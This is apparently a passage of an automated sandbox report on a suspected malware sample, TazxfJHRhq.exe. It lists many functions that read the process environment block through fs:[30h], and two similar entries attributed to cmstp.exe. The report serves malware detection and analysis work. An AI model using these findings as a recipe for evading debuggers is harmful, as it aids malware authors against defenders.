          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h] 1_2_00A752A5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h] 1_2_00A752A5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h] 1_2_00A752A5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A752A5 mov eax, dword ptr fs:[00000030h] 1_2_00A752A5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A8AAB0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A8AAB0 mov eax, dword ptr fs:[00000030h] 1_2_00A8AAB0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAFAB0 mov eax, dword ptr fs:[00000030h] 1_2_00AAFAB0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h] 1_2_00AAD294
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAD294 mov eax, dword ptr fs:[00000030h] 1_2_00AAD294
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA2AE4 mov eax, dword ptr fs:[00000030h] 1_2_00AA2AE4
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA2ACB mov eax, dword ptr fs:[00000030h] 1_2_00AA2ACB
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h] 1_2_00AB4A2C
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB4A2C mov eax, dword ptr fs:[00000030h] 1_2_00AB4A2C
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A88A0A mov eax, dword ptr fs:[00000030h] 1_2_00A88A0A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h] 1_2_00B3AA16
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3AA16 mov eax, dword ptr fs:[00000030h] 1_2_00B3AA16
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h] 1_2_00A7AA16
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A7AA16 mov eax, dword ptr fs:[00000030h] 1_2_00A7AA16
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A93A1C mov eax, dword ptr fs:[00000030h] 1_2_00A93A1C
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h] 1_2_00A75210
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A75210 mov ecx, dword ptr fs:[00000030h] 1_2_00A75210
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h] 1_2_00A75210
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A75210 mov eax, dword ptr fs:[00000030h] 1_2_00A75210
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AB927A mov eax, dword ptr fs:[00000030h] 1_2_00AB927A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h] 1_2_00B2B260
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B2B260 mov eax, dword ptr fs:[00000030h] 1_2_00B2B260
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B48A62 mov eax, dword ptr fs:[00000030h] 1_2_00B48A62
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3EA55 mov eax, dword ptr fs:[00000030h] 1_2_00B3EA55
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h] 1_2_00A79240
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h] 1_2_00A79240
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h] 1_2_00A79240
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A79240 mov eax, dword ptr fs:[00000030h] 1_2_00A79240
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B04257 mov eax, dword ptr fs:[00000030h] 1_2_00B04257
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h] 1_2_00AA4BAD
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h] 1_2_00AA4BAD
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA4BAD mov eax, dword ptr fs:[00000030h] 1_2_00AA4BAD
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B45BA5 mov eax, dword ptr fs:[00000030h] 1_2_00B45BA5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h] 1_2_00A81B8F
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A81B8F mov eax, dword ptr fs:[00000030h] 1_2_00A81B8F
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B2D380 mov ecx, dword ptr fs:[00000030h] 1_2_00B2D380
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00B3138A mov eax, dword ptr fs:[00000030h] 1_2_00B3138A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AAB390 mov eax, dword ptr fs:[00000030h] 1_2_00AAB390
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA2397 mov eax, dword ptr fs:[00000030h] 1_2_00AA2397
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00A9DBE9 mov eax, dword ptr fs:[00000030h] 1_2_00A9DBE9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AA03E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AA03E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AA03E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exe | Code function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h] 1_2_00AA03E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]1_2_00AA03E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA03E2 mov eax, dword ptr fs:[00000030h]1_2_00AA03E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h]1_2_00AF53CA
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF53CA mov eax, dword ptr fs:[00000030h]1_2_00AF53CA
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3131B mov eax, dword ptr fs:[00000030h]1_2_00B3131B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7DB60 mov ecx, dword ptr fs:[00000030h]1_2_00A7DB60
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h]1_2_00AA3B7A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA3B7A mov eax, dword ptr fs:[00000030h]1_2_00AA3B7A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7DB40 mov eax, dword ptr fs:[00000030h]1_2_00A7DB40
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48B58 mov eax, dword ptr fs:[00000030h]1_2_00B48B58
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7F358 mov eax, dword ptr fs:[00000030h]1_2_00A7F358
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8849B mov eax, dword ptr fs:[00000030h]1_2_00A8849B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B314FB mov eax, dword ptr fs:[00000030h]1_2_00B314FB
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AF6CF0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AF6CF0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6CF0 mov eax, dword ptr fs:[00000030h]1_2_00AF6CF0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48CD6 mov eax, dword ptr fs:[00000030h]1_2_00B48CD6
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AABC2C mov eax, dword ptr fs:[00000030h]1_2_00AABC2C
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]1_2_00AF6C0A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]1_2_00AF6C0A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]1_2_00AF6C0A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6C0A mov eax, dword ptr fs:[00000030h]1_2_00AF6C0A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31C06 mov eax, dword ptr fs:[00000030h]1_2_00B31C06
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]1_2_00B4740D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]1_2_00B4740D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4740D mov eax, dword ptr fs:[00000030h]1_2_00B4740D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9746D mov eax, dword ptr fs:[00000030h]1_2_00A9746D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h]1_2_00B0C450
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0C450 mov eax, dword ptr fs:[00000030h]1_2_00B0C450
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA44B mov eax, dword ptr fs:[00000030h]1_2_00AAA44B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA35A1 mov eax, dword ptr fs:[00000030h]1_2_00AA35A1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h]1_2_00B405AC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B405AC mov eax, dword ptr fs:[00000030h]1_2_00B405AC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AA1DB5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AA1DB5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA1DB5 mov eax, dword ptr fs:[00000030h]1_2_00AA1DB5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]1_2_00AA2581
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]1_2_00AA2581
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]1_2_00AA2581
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA2581 mov eax, dword ptr fs:[00000030h]1_2_00AA2581
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]1_2_00A72D8A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]1_2_00A72D8A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]1_2_00A72D8A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]1_2_00A72D8A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A72D8A mov eax, dword ptr fs:[00000030h]1_2_00A72D8A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]1_2_00AAFD9B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAFD9B mov eax, dword ptr fs:[00000030h]1_2_00AAFD9B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B28DF1 mov eax, dword ptr fs:[00000030h]1_2_00B28DF1
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A8D5E0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8D5E0 mov eax, dword ptr fs:[00000030h]1_2_00A8D5E0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B3FDE2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B3FDE2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B3FDE2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3FDE2 mov eax, dword ptr fs:[00000030h]1_2_00B3FDE2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AF6DC9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AF6DC9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AF6DC9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov ecx, dword ptr fs:[00000030h]1_2_00AF6DC9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AF6DC9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF6DC9 mov eax, dword ptr fs:[00000030h]1_2_00AF6DC9
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48D34 mov eax, dword ptr fs:[00000030h]1_2_00B48D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3E539 mov eax, dword ptr fs:[00000030h]1_2_00B3E539
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]1_2_00AA4D3B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]1_2_00AA4D3B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA4D3B mov eax, dword ptr fs:[00000030h]1_2_00AA4D3B
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7AD30 mov eax, dword ptr fs:[00000030h]1_2_00A7AD30
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AFA537 mov eax, dword ptr fs:[00000030h]1_2_00AFA537
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A83D34 mov eax, dword ptr fs:[00000030h]1_2_00A83D34
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]1_2_00A9C577
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9C577 mov eax, dword ptr fs:[00000030h]1_2_00A9C577
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB3D43 mov eax, dword ptr fs:[00000030h]1_2_00AB3D43
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF3540 mov eax, dword ptr fs:[00000030h]1_2_00AF3540
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B23D40 mov eax, dword ptr fs:[00000030h]1_2_00B23D40
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A97D50 mov eax, dword ptr fs:[00000030h]1_2_00A97D50
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF46A7 mov eax, dword ptr fs:[00000030h]1_2_00AF46A7
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]1_2_00B40EA5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]1_2_00B40EA5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B40EA5 mov eax, dword ptr fs:[00000030h]1_2_00B40EA5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0FE87 mov eax, dword ptr fs:[00000030h]1_2_00B0FE87
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA16E0 mov ecx, dword ptr fs:[00000030h]1_2_00AA16E0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A876E2 mov eax, dword ptr fs:[00000030h]1_2_00A876E2
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48ED6 mov eax, dword ptr fs:[00000030h]1_2_00B48ED6
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA36CC mov eax, dword ptr fs:[00000030h]1_2_00AA36CC
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB8EC7 mov eax, dword ptr fs:[00000030h]1_2_00AB8EC7
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2FEC0 mov eax, dword ptr fs:[00000030h]1_2_00B2FEC0
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7E620 mov eax, dword ptr fs:[00000030h]1_2_00A7E620
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B2FE3F mov eax, dword ptr fs:[00000030h]1_2_00B2FE3F
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]1_2_00A7C600
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]1_2_00A7C600
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A7C600 mov eax, dword ptr fs:[00000030h]1_2_00A7C600
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AA8E00 mov eax, dword ptr fs:[00000030h]1_2_00AA8E00
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]1_2_00AAA61C
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA61C mov eax, dword ptr fs:[00000030h]1_2_00AAA61C
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B31608 mov eax, dword ptr fs:[00000030h]1_2_00B31608
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8766D mov eax, dword ptr fs:[00000030h]1_2_00A8766D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]1_2_00A9AE73
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]1_2_00A9AE73
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]1_2_00A9AE73
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]1_2_00A9AE73
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9AE73 mov eax, dword ptr fs:[00000030h]1_2_00A9AE73
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]1_2_00A87E41
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]1_2_00A87E41
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]1_2_00A87E41
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]1_2_00A87E41
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]1_2_00A87E41
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A87E41 mov eax, dword ptr fs:[00000030h]1_2_00A87E41
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]1_2_00B3AE44
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B3AE44 mov eax, dword ptr fs:[00000030h]1_2_00B3AE44
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]1_2_00AF7794
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]1_2_00AF7794
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AF7794 mov eax, dword ptr fs:[00000030h]1_2_00AF7794
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A88794 mov eax, dword ptr fs:[00000030h]1_2_00A88794
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AB37F5 mov eax, dword ptr fs:[00000030h]1_2_00AB37F5
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]1_2_00A74F2E
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A74F2E mov eax, dword ptr fs:[00000030h]1_2_00A74F2E
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAE730 mov eax, dword ptr fs:[00000030h]1_2_00AAE730
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]1_2_00B0FF10
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B0FF10 mov eax, dword ptr fs:[00000030h]1_2_00B0FF10
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]1_2_00AAA70E
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00AAA70E mov eax, dword ptr fs:[00000030h]1_2_00AAA70E
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]1_2_00B4070D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B4070D mov eax, dword ptr fs:[00000030h]1_2_00B4070D
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A9F716 mov eax, dword ptr fs:[00000030h]1_2_00A9F716
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8FF60 mov eax, dword ptr fs:[00000030h]1_2_00A8FF60
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00B48F6A mov eax, dword ptr fs:[00000030h]1_2_00B48F6A
          Source: C:\Users\user\Desktop\TazxfJHRhq.exeCode function: 1_2_00A8EF40 mov eax, dword ptr fs:[00000030h]1_2_00A8EF40
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0460746D mov eax, dword ptr fs:[00000030h]4_2_0460746D
          Source: C:\Windows\SysWOW64\cmstp.exeCode function: 4_2_0461A44B mov eax, dword ptr fs:[00000030h]4_2_0461A44B
